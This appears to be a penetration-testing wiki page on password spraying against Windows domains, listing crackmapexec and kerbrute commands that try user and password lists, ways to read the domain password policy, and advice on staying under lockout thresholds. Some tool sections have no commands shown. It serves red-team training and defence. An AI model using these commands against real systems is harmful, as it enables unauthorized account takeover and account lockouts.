Password Spraying

Password Spraying

Once you have found several valid usernames you can try the most common passwords (keep in mind the password policy of the environment) with each of the discovered users. By default the minimum password length is 7.

Lists of common usernames could also be useful: https://github.com/insidetrust/statistically-likely-usernames

Notice that you could lockout some accounts if you try several wrong passwords (by default more than 10).

Get password policy

If you have some user credentials or a shell as a domain user you can get the password policy with:

  • crackmapexec <IP> -u 'user' -p 'password' --pass-pol

  • enum4linx -u 'username' -p 'password' -P <IP>

  • (Get-DomainPolicy)."System Access" #From powerview

Exploitation

Using crackmapexec:

crackmapexec smb <IP> -u users.txt -p passwords.txt

Using kerbrute(python) - NOT RECOMMENDED SOMETIMES DOESN'T WORK

python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt

Kerbrute also tells if a username is valid.

Using kerbrute(Go)

With Rubeus version with brute module:

With the scanner/smb/smb_login module of Metasploit:

With Invoke-DomainPasswordSpray

or spray (read next section).

Lockout check

The best way is not to try with more than 5/7 passwords per account.

So you have to be very careful with password spraying because you could lockout accounts. To brute force taking this into mind, you can use spray:

****More information and rudimentary password spray techniques in ired.team.****

上一页Pass the Ticket下一页Printers Spooler Service abuse

最后更新于

这有帮助吗?